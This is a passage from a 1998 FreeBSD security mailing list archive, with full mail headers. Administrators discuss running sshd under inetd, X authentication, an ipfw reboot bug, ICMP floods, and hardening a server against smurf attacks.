Systems TCP/IP networking jeff@mountin.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 23:24:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA10745 for freebsd-security-outgoing; Sun, 13 Sep 1998 23:24:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from super-g.inch.com (super-g.com [207.240.140.161]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA10740 for ; Sun, 13 Sep 1998 23:23:56 -0700 (PDT) (envelope-from spork@super-g.com) Received: from localhost (localhost [127.0.0.1]) by super-g.inch.com (8.8.8/8.8.5) with SMTP id CAA06681; Mon, 14 Sep 1998 02:22:58 -0400 (EDT) Date: Mon, 14 Sep 1998 02:22:58 -0400 (EDT) From: spork X-Sender: spork@super-g.inch.com To: "Jeffrey J. Mountin" cc: Roger Marquis , freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <3.0.3.32.19980914002155.0078fb78@207.227.119.2> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Data Point: A dozen machines, all running sshd as a daemon. Been doing it for more than two years. Number of times sshd died: 0 Number of times inetd died: 4-ish (junk pointer, too low to make sense) Number of years since machines that don't need inetd services have been running with no inetd, and hence no backup telnetd: 1 Number of times bitten: 0 If you really need a backup access method, get a console server :) Charles --- Charles Sprickman spork@super-g.com --- "...there's no idea that's so good you can't ruin it with a few well-placed idiots." On Mon, 14 Sep 1998, Jeffrey J. Mountin wrote: > At 07:59 PM 9/12/98 -0700, Roger Marquis wrote: > >If you're running inetd then it doesn't seem consistent to start > >daemons that don't need to run all the time from startup scripts. > >Inetd was designed to conserve memory. If you have it why not use it? > >/etc/inetd.conf is also a common place to implement access control (via > >tcp_wrappers). > > The parent only takes up about 600K or so. As someone mentioned, keeping ssh out of inetd give you a backup access method, which would be telnet w/SKEY. > > >Other than that I've frequently run into situations where keepalives > >had to be turned off. In those cases ssh sessions invariably die and > >their daemons have to be killed-off by hand (kill ). As it is > >difficult to tell the original daemon from the child daemons it's also > >easy to accidentally kill the parent. If ssh is the only access you're > >locked-out. Easier and more consistent to use inetd where it's > >available, IMHO and YMMV. > > Rarely have I seen hung sessions, even after being rudely disconnected by the IPS(s) I connect into. Even then what's so diffifcult about killing the child? > > # ps -ax -o uid,pid,ppid,state,tt,start,time,command | grep ssh > UID PID PPID STAT TT STARTED TIME COMMAND > 0 149 1 Is ?? Fri06AM 0:05.52 /usr/local/sbin/sshd (sshd1) > 0 28319 149 S ?? 10:35PM 0:09.78 /usr/local/sbin/sshd (sshd1) > > Only one session leader here and killing the parent would be bad form. 8-) > > FWIW, you can -HUP the parent while on an active ssh session and not be disconnected. If you use -HUP the worst that you could do is disconnect someone. > > > Jeff Mountin - Unix Systems TCP/IP networking > jeff@mountin.net > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 23:29:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA11289 for freebsd-security-outgoing; Sun, 13 Sep 1998 23:29:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA11255 for ; Sun, 13 Sep 1998 23:28:47 -0700 (PDT) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by gratis.grondar.za (8.9.1/8.9.1) with ESMTP id IAA19308; Mon, 14 Sep 1998 08:28:14 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199809140628.IAA19308@gratis.grondar.za> To: Peter Jeremy cc: freebsd-security@FreeBSD.ORG Subject: Re: X-security In-Reply-To: Your message of " Mon, 14 Sep 1998 14:49:35 +1000." <98Sep14.144916est.40329@border.alcanet.com.au> References: <98Sep14.144916est.40329@border.alcanet.com.au> Date: Mon, 14 Sep 1998 08:28:13 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Peter Jeremy wrote: > If you're worried about someone stealing your authentication token, > you'll need to use something like XDM-AUTHORIZATION-1 (*), SUN-DES-1 (**) > or ssh. : : > (**) I don't believe this is supported by anyone except Sun. Build the FreeBSD port of XFree86 on a 3.0-CURRENT box. You can ask for SUN-DES-1. M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 23:40:39 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA13835 for freebsd-security-outgoing; Sun, 13 Sep 1998 23:40:39 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA13825 for ; Sun, 13 Sep 1998 23:40:34 -0700 (PDT) (envelope-from archie@whistle.com) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id XAA17637; Sun, 13 Sep 1998 23:40:19 -0700 (PDT) Received: from bubba.whistle.com(207.76.205.7) by whistle.com via smap (V1.3) id sma017635; Sun Sep 13 23:40:10 1998 Received: (from archie@localhost) by bubba.whistle.com (8.8.7/8.6.12) id XAA16448; Sun, 13 Sep 1998 23:40:09 -0700 (PDT) From: Archie Cobbs Message-Id: <199809140640.XAA16448@bubba.whistle.com> Subject: Re: A question probably relevant to IPFW In-Reply-To: <19980913104429.16468.qmail@hotmail.com> from "N. N.M" at "Sep 13, 98 03:44:28 am" To: madrapour@hotmail.com (N. N.M) Date: Sun, 13 Sep 1998 23:40:09 -0700 (PDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org N. N.M writes: > I was wondering if somebody could help me. I had a FreeBSD with IPFW > active on it to filter some kinds of packets. It was rebooted > automatically and frequently every 2 or 3 days at 2 am. I've removed > IPFW from it and also set up another FreeBSD (with the same > configuration) as the active filter. Now the new computer does the same: > it's rebooted automacally and frequently every 2-3 days at 2 am. But the > former computer hasn't been rebooted after removing IPFW from it and > since the time it wasn't the active filter. There is an old bug in ipfw that was fixed about a year ago. If you're running an old (eg, pre-2.2.6) version of FreeBSD try upgrading. Otherwise, nevermind :-) -Archie ___________________________________________________________________________ Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Sep 13 23:57:40 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA16760 for freebsd-security-outgoing; Sun, 13 Sep 1998 23:57:40 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from aniwa.sky (pppk-28.igrin.co.nz [202.49.245.107]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA16753 for ; Sun, 13 Sep 1998 23:57:28 -0700 (PDT) (envelope-from andrew@squiz.co.nz) Received: from localhost (andrew@localhost) by aniwa.sky (8.8.7/8.8.7) with SMTP id SAA04317; Mon, 14 Sep 1998 18:51:01 +1200 (NZST) (envelope-from andrew@squiz.co.nz) Date: Mon, 14 Sep 1998 18:51:01 +1200 (NZST) From: Andrew McNaughton X-Sender: andrew@aniwa.sky Reply-To: andrew@squiz.co.nz To: "Jeffrey J. Mountin" cc: Roger Marquis , freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: <3.0.3.32.19980914002155.0078fb78@207.227.119.2> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 14 Sep 1998, Jeffrey J. Mountin wrote: > >Other than that I've frequently run into situations where keepalives > >had to be turned off. In those cases ssh sessions invariably die and > >their daemons have to be killed-off by hand (kill ). As it is > >difficult to tell the original daemon from the child daemons it's also > >easy to accidentally kill the parent. If ssh is the only access you're > >locked-out. Easier and more consistent to use inetd where it's > >available, IMHO and YMMV. > > Rarely have I seen hung sessions, even after being rudely disconnected > by the IPS(s) I connect into. Even then what's so diffifcult about > killing the child? I've had problems after having my modem drop and redial. Mostly sessions seem to survive this (with a fixed IP), but occasionally they haven't, and I've been unable to create new connections to sshd until I've killed the demon process of the crashed session. This has happened to me three times, and in all cases I've had multiple sessions open and I've still had a live connection which I've been able to use to retrieve the situation. I can't say whether sshd recovers itself eventually, but it's not quick. Andrew McNaughton To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 00:06:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA17802 for freebsd-security-outgoing; Mon, 14 Sep 1998 00:06:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA17793; Mon, 14 Sep 1998 00:06:39 -0700 (PDT) (envelope-from archie@whistle.com) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id AAA17980; Mon, 14 Sep 1998 00:06:23 -0700 (PDT) Received: from bubba.whistle.com(207.76.205.7) by whistle.com via smap (V1.3) id sma017978; Mon Sep 14 00:06:05 1998 Received: (from archie@localhost) by bubba.whistle.com (8.8.7/8.6.12) id AAA16521; Mon, 14 Sep 1998 00:06:05 -0700 (PDT) From: Archie Cobbs Message-Id: <199809140706.AAA16521@bubba.whistle.com> Subject: Re: sshd In-Reply-To: from John Fieber at "Sep 12, 98 11:35:54 pm" To: jfieber@indiana.edu (John Fieber) Date: Mon, 14 Sep 1998 00:06:05 -0700 (PDT) Cc: marquis@roble.com, freebsd-security@FreeBSD.ORG, ports@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org John Fieber writes: > > For one thing 'make -n install' typically doesn't yield readable > > information unless you first 'cd work/*'. > > 'more pkg/PLIST' is generally more efficient......if the PLIST is > accurate. > > > Secondly, while port A installs under /usr/, port B > > installs to /usr/local/etc and port C in /usr/libexec, ... > > You can never be sure what is going where and it's a rare > > port that can be uninstalled with 'make uninstall'. > > ... > > A more frustrating problem for me are ports that are not > ${PREFIX} != /usr/local compatible which makes it a hassle to > install multiple version of a port or separate ports that have > common files. Also, I occasionaly go through phases of liking > SysV way of installing things in /opt/, > /etc/opt/ and /var/opt/ which a simple 'make > PREFIX=/opt/' doesn't really accomplish. If someone was interested, it would be easy to write a script that checks all the ports: - mount / and /usr read-only - mount /usr/local and /usr/local2 read-write, initially empty except for the directory structure - save mtree dumps of every file in /usr/local and /usr/local2 - cycle through every port and: - build the port with PREFIX=/usr/local - install the port, then uninstall the port - compare the contents of /usr/local with the mtree file - build the port with PREFIX=/usr/local2 - install the port, then uninstall the port - compare the contents of /usr/local2 AND /usr/local with the mtree files If any port exhibited bad behavior, it could also automatically generate a send-pr report :-) -Archie ___________________________________________________________________________ Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 00:42:13 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA23049 for freebsd-security-outgoing; Mon, 14 Sep 1998 00:42:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from redfish.go2net.com (redfish.go2net.com [207.178.55.5]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id AAA22992 for ; Mon, 14 Sep 1998 00:42:08 -0700 (PDT) (envelope-from marcs@go2net.com) Received: from marcs by redfish.go2net.com with smtp (Exim 1.82 #2) id 0zITF7-0003f3-00; Mon, 14 Sep 1998 00:40:13 -0700 Date: Mon, 14 Sep 1998 00:40:13 -0700 (PDT) From: Marc Slemko X-Sender: marcs@redfish To: Andrew McNaughton cc: freebsd-security@FreeBSD.ORG Subject: Re: sshd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 14 Sep 1998, Andrew McNaughton wrote: > > Rarely have I seen hung sessions, even after being rudely disconnected > > by the IPS(s) I connect into. Even then what's so diffifcult about > > killing the child? > > I've had problems after having my modem drop and redial. Mostly sessions > seem to survive this (with a fixed IP), but occasionally they haven't, and > I've been unable to create new connections to sshd until I've killed the > demon process of the crashed session. This has happened to me three > times, and in all cases I've had multiple sessions open and I've still had > a live connection which I've been able to use to retrieve the situation. > I can't say whether sshd recovers itself eventually, but it's not quick. That is a differnet issue and will happen if it is running from inetd or standalone. What is probably happening there is that your machine thinks the connection is dead, but the server doesn't know it thinks that since the connection was down when it began to think that. By chance (not random chance, of course) if your client decides to use the same client port, then its connection attempt will look like bogus data from the existing connection to the server. Until the server tries to send something (eg. keepalive) to the client and gets a RST, this will keep happening. The way around it is to just try sshing in twice at the same time; obviously, then one has to use a different port. If you had multiple sessions open, then you may need to do n+1 sessions to get in from the client. Randomized allocation of ports on the client side (a libc thing) would avoid this, and would certainly avoid the case where it keeps happening over and over due to deterministic port allocation by the client. There is a thread about this (not related specifically to ssh, IIRC) from some list (tcp-impl or end2end-interest I think...) that I should reference here, but my brain doesn't want me to go look it up. It is possible this was already changed in -current, don't know. Of course, this may not be your problem but it does sound like it. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 00:52:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA24951 for freebsd-security-outgoing; Mon, 14 Sep 1998 00:52:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA24835; Mon, 14 Sep 1998 00:52:03 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.1/8.8.5) with ESMTP id JAA22466; Mon, 14 Sep 1998 09:45:21 +0200 (CEST) To: Archie Cobbs cc: jfieber@indiana.edu (John Fieber), marquis@roble.com, freebsd-security@FreeBSD.ORG, ports@FreeBSD.ORG Subject: Re: sshd In-reply-to: Your message of "Mon, 14 Sep 1998 00:06:05 PDT." <199809140706.AAA16521@bubba.whistle.com> Date: Mon, 14 Sep 1998 09:45:21 +0200 Message-ID: <22464.905759121@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199809140706.AAA16521@bubba.whistle.com>, Archie Cobbs writes: >If someone was interested, it would be easy to write a script >that checks all the ports: By all means go for it :-) Poul-Henning > > - mount / and /usr read-only > - mount /usr/local and /usr/local2 read-write, initially empty > except for the directory structure > - save mtree dumps of every file in /usr/local and /usr/local2 > - cycle through every port and: > - build the port with PREFIX=/usr/local > - install the port, then uninstall the port > - compare the contents of /usr/local with the mtree file > - build the port with PREFIX=/usr/local2 > - install the port, then uninstall the port > - compare the contents of /usr/local2 AND /usr/local > with the mtree files > >If any port exhibited bad behavior, it could also automatically >generate a send-pr report :-) > >-Archie > >___________________________________________________________________________ >Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." "ttyv0" -- What UNIX calls a $20K state-of-the-art, 3D, hi-res color terminal To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 01:08:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA27435 for freebsd-security-outgoing; Mon, 14 Sep 1998 01:08:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from ns0.fast.net.uk (ns0.fast.net.uk [194.207.104.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA27372 for ; Mon, 14 Sep 1998 01:08:03 -0700 (PDT) (envelope-from netadmin@fastnet.co.uk) Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id JAA20982 for ; Mon, 14 Sep 1998 09:07:41 +0100 (BST) Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by na.nu.na.nu (8.8.8/8.8.8) with SMTP id JAA14358 for ; Mon, 14 Sep 1998 09:07:40 +0100 (BST) (envelope-from netadmin@fastnet.co.uk) Date: Mon, 14 Sep 1998 09:07:40 +0100 (BST) From: Jay Tribick X-Sender: netadmin@bofh.fast.net.uk To: security@FreeBSD.ORG Subject: Re: odd icmp packet In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org | I monitor odd packets on broadcast channels, and this turned up in my | logs: | | Sep 14 14:57:55 dawn /kernel: ipfw: 60100 Accept ICMP:11.0 xxx.xx.xx.xx | 255.255.255.255 in via de0 | | xxx.xx.xx.xx is not on my subnet, but the machine which recorded this is | not behind a firewall except in so far as it runs its own filters | | ICMP:11.0 indicates time exceeded in transit. Can someone explain what | might have caused this. | | Am I correct in thinking that because ICMP packets do not generate | responses this does not have DoS relevance? Not really, an ICMP ping flood is quite a substantial way of DoS'ing someone and tends to eat up all the bandwidth on a modem connection - depending upon the source of the ICMPs you could quite easily saturate a [T|E]1 or higher. It's often used on the IRC networks when someone's trying to flood someone else off. Your right in thinking that a Time Exceeded in Transit can't cause a DoS though (although someone's bound to prove me wrong ;) Regards, Jay Tribick -- [| Network Admin | FastNet International | http://fast.net.uk/ |] [| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |] [| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 02:19:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA06547 for freebsd-security-outgoing; Mon, 14 Sep 1998 02:19:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from orbital.tiora.net (cx31658-a.escnd1.sdca.home.com [24.0.185.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA06532 for ; Mon, 14 Sep 1998 02:18:58 -0700 (PDT) (envelope-from liam@orbital.tiora.net) Received: from localhost (liam@localhost) by orbital.tiora.net (8.9.1a/8.9.1a+rbl+antispam+zol_hack) with SMTP id BAA00727 for ; Mon, 14 Sep 1998 01:59:25 -0700 (PDT) Date: Mon, 14 Sep 1998 01:59:24 -0700 (PDT) From: Liam Slusser To: security@FreeBSD.ORG Subject: smurf and broadcast packets.. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Today my server was bombed by a smurf attack. After i got everthing up and running again, i went out and tried to figure out how to stop it from happening again. I found a CERT advisory ("smurf" IP Denial-of-Service Attacks) (CA-98.01.smurf) and read up on it. From what i understand, it is a ping on *.*.*.255..which gets multiplied. I tried ping my network (24.0.185.255) and my server replied. So i did a little more looking, and found a post, http://www.geek-girl.com/bugtraq/1998_2/0421.html (explains FreeBSD smurf vulnerability) on the problem. I installed the patch which invalved editing ip_icmp.c in the kernel source...then i came back up...i tried again...but i could still ping 24.0.185.255 and get a reply. >From there, i checked sysctl "net.inet.icmp.bmcastecho" and noticed it was set at 1. I changed it to 0, and from there...i ran into a wierd problem. My server has two network cards in it, ed0 (internet side, 24.0.185.89) and ed1 (internal network, 10.0.0.1), and runs natd. When i turned net.inet.icmp.bmcastecho to 0..i could not ping 10.0.0.255 but i could ping my internet side 24.0.189.255. ping 10.0.0.255 PING 10.0.0.255 (10.0.0.255): 56 data bytes --- 10.0.0.255 ping statistics --- 2 packets transmitted, 0 packets received, 100% packet loss ping 24.0.185.255 PING 24.0.185.255 (24.0.185.255): 56 data bytes 64 bytes from 24.0.185.89: icmp_seq=0 ttl=255 time=0.857 ms 64 bytes from 24.0.185.89: icmp_seq=1 ttl=255 time=0.692 ms --- 24.0.185.255 ping statistics --- 2 packets transmitted, 2 packets received, 0% packet loss With "net.inet.icmp.bmcastecho" set at 1, i could ping 10.0.0.255 and get a reply..but not at 0. I do have ipfw installed..the rules as follows: ipfw list 00100 divert 6668 ip from any to any via ed0 00200 allow ip from any to any 65535 deny ip from any to any By the way, my server is running... uname -a FreeBSD orbital.tiora.net 3.0-971225-SNAP FreeBSD 3.0-971225-SNAP #0: Mon Sep 14 00:59:08 PDT 1998 liam@orbital.tiora.net:/usr/src/sys/compile/orbital i386 What am i doing wrong? What can i do to stop my server from being the victom of another smurf attack? thanks for the help! liam System Administrator Tiora Networks | www.tiora.net <---- tiora's webpage www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address Lowered turbo powered Honda Civic's are really cool. <---------- my quote To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 02:23:13 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA07129 for freebsd-security-outgoing; Mon, 14 Sep 1998 02:23:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from orbital.tiora.net (cx31658-a.escnd1.sdca.home.com [24.0.185.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA07124 for ; Mon, 14 Sep 1998 02:23:12 -0700 (PDT) (envelope-from liam@orbital.tiora.net) Received: from localhost (liam@localhost) by orbital.tiora.net (8.9.1a/8.9.1a+rbl+antispam+zol_hack) with SMTP id CAA00907 for ; Mon, 14 Sep 1998 02:03:41 -0700 (PDT) Date: Mon, 14 Sep 1998 02:03:40 -0700 (PDT) From: Liam Slusser To: freebsd-security@FreeBSD.ORG Subject: smurf and broadcast packets.. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Today my server was bombed by a smurf attack. After i got everthing up and running again, i went out and tried to figure out how to stop it from happening again. I found a CERT advisory ("smurf" IP Denial-of-Service Attacks) (CA-98.01.smurf) and read up on it. From what i understand, it is a ping on *.*.*.255..which gets multiplied. I tried ping my network (24.0.185.255) and my server replied. So i did a little more looking, and found a post, http://www.geek-girl.com/bugtraq/1998_2/0421.html (explains FreeBSD smurf vulnerability) on the problem. I installed the patch which invalved editing ip_icmp.c in the kernel source...then i came back up...i tried again...but i could still ping 24.0.185.255 and get a reply. >From there, i checked sysctl "net.inet.icmp.bmcastecho" and noticed it was set at 1. I changed it to 0, and from there...i ran into a wierd problem. My server has two network cards in it, ed0 (internet side, 24.0.185.89) and ed1 (internal network, 10.0.0.1), and runs natd. When i turned net.inet.icmp.bmcastecho to 0..i could not ping 10.0.0.255 but i could ping my internet side 24.0.189.255. ping 10.0.0.255 PING 10.0.0.255 (10.0.0.255): 56 data bytes --- 10.0.0.255 ping statistics --- 2 packets transmitted, 0 packets received, 100% packet loss ping 24.0.185.255 PING 24.0.185.255 (24.0.185.255): 56 data bytes 64 bytes from 24.0.185.89: icmp_seq=0 ttl=255 time=0.857 ms 64 bytes from 24.0.185.89: icmp_seq=1 ttl=255 time=0.692 ms --- 24.0.185.255 ping statistics --- 2 packets transmitted, 2 packets received, 0% packet loss With "net.inet.icmp.bmcastecho" set at 1, i could ping 10.0.0.255 and get a reply..but not at 0. I do have ipfw installed..the rules as follows: ipfw list 00100 divert 6668 ip from any to any via ed0 00200 allow ip from any to any 65535 deny ip from any to any By the way, my server is running... uname -a FreeBSD orbital.tiora.net 3.0-971225-SNAP FreeBSD 3.0-971225-SNAP #0: Mon Sep 14 00:59:08 PDT 1998 liam@orbital.tiora.net:/usr/src/sys/compile/orbital i386 What am i doing wrong? What can i do to stop my server from being the victom of another smurf attack? thanks for the help! liam System Administrator Tiora Networks | www.tiora.net <---- tiora's webpage www.tiora.net/~liam <----- homepage | liam@tiora.net <-- my email address Lowered turbo powered Honda Civic's are really cool. <---------- my quote To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 06:11:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id GAA02571 for freebsd-security-outgoing; Mon, 14 Sep 1998 06:11:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from drwho.xnet.com (drwho.xnet.com [205.243.140.183]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id GAA02565 for ; Mon, 14 Sep 1998 06:11:09 -0700 (PDT) (envelope-from drwho@drwho.xnet.com) Received: (from drwho@localhost) by drwho.xnet.com (8.8.8/8.8.8) id IAA27428; Mon, 14 Sep 1998 08:10:49 -0500 (CDT) (envelope-from drwho) Message-ID: <19980914081048.A27142@drwho.xnet.com> Date: Mon, 14 Sep 1998 08:10:48 -0500 From: Michael Maxwell To: freebsd-security@FreeBSD.ORG Subject: innd 1.7.2 issues... Mail-Followup-To: freebsd-security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91i X-Useless-Header: http://www.xnet.com/~drwho/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I wonder if anyone is aware of any new exploits concerning innd 1.7.2? I have not seen anything on CERT recently. I noticed that I have been getting several refused connections to my nnrpd port -- naturally I disallow all connections outside my local site, so the logs show the connection as "no permission". Normally, this wouldn't concern me, but the last 2 weeks or so, I have gotten maybe 15 connections of this type, when normally I get none. The connections are USUALLY from different domains (I think only once was there a repeat) -- drwho @ xnet.com -- http://www.xnet.com/~drwho/ "Freedom of government is good, but freedom FROM government is better." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 07:58:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA15144 for freebsd-security-outgoing; Mon, 14 Sep 1998 07:58:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from relay.ripco.com (relay.ripco.com [209.100.227.3]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id HAA15137 for ; Mon, 14 Sep 1998 07:58:07 -0700 (PDT) (envelope-from rezidew@rezidew.net) Received: (qmail 22854 invoked from network); 14 Sep 1998 14:57:53 -0000 Received: from soap.rezidew.net (HELO rezidew.net) (209.100.228.86) by relay.ripco.com with SMTP; 14 Sep 1998 14:57:53 -0000 Message-ID: <35FD30D3.E2ABACB1@rezidew.net> Date: Mon, 14 Sep 1998 10:05:55 -0500 From: Graphic Rezidew Organization: rezidew.net X-Mailer: Mozilla 4.04 [en] (X11; I; FreeBSD 2.2.7-RELEASE i386) MIME-Version: 1.0 To: FreeBSD-security-List Subject: version of sshd Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org First off, thanks to everyone that responded to my earlier plea for assistance, regarding SSH. Now I have a new question; does anyone know if version 1.2.26 of ssh has any currently known exploits? I ask because that's the version availible from the ports/packages, and I don't want to install potentially hazardous software. I know that version 2.0.x is availible but since all of the clients that I'll be using are 1.x I don't see any reason to install a 2.0.x server unless it's decidedly more secure. -thanks in advance. -- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Real programmers don't comment their code. It was hard to write, it should be hard to understand. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Graphic Rezidew Graphic@rezidew.net http://Graphic.Rezidew.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Sep 14 08:28:27 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id IAA19295 for freebsd-security-outgoing; Mon, 14 Sep 1998 08:28:27 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id IAA19271 for ; Mon, 14 Sep 1998 08:28:09 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by 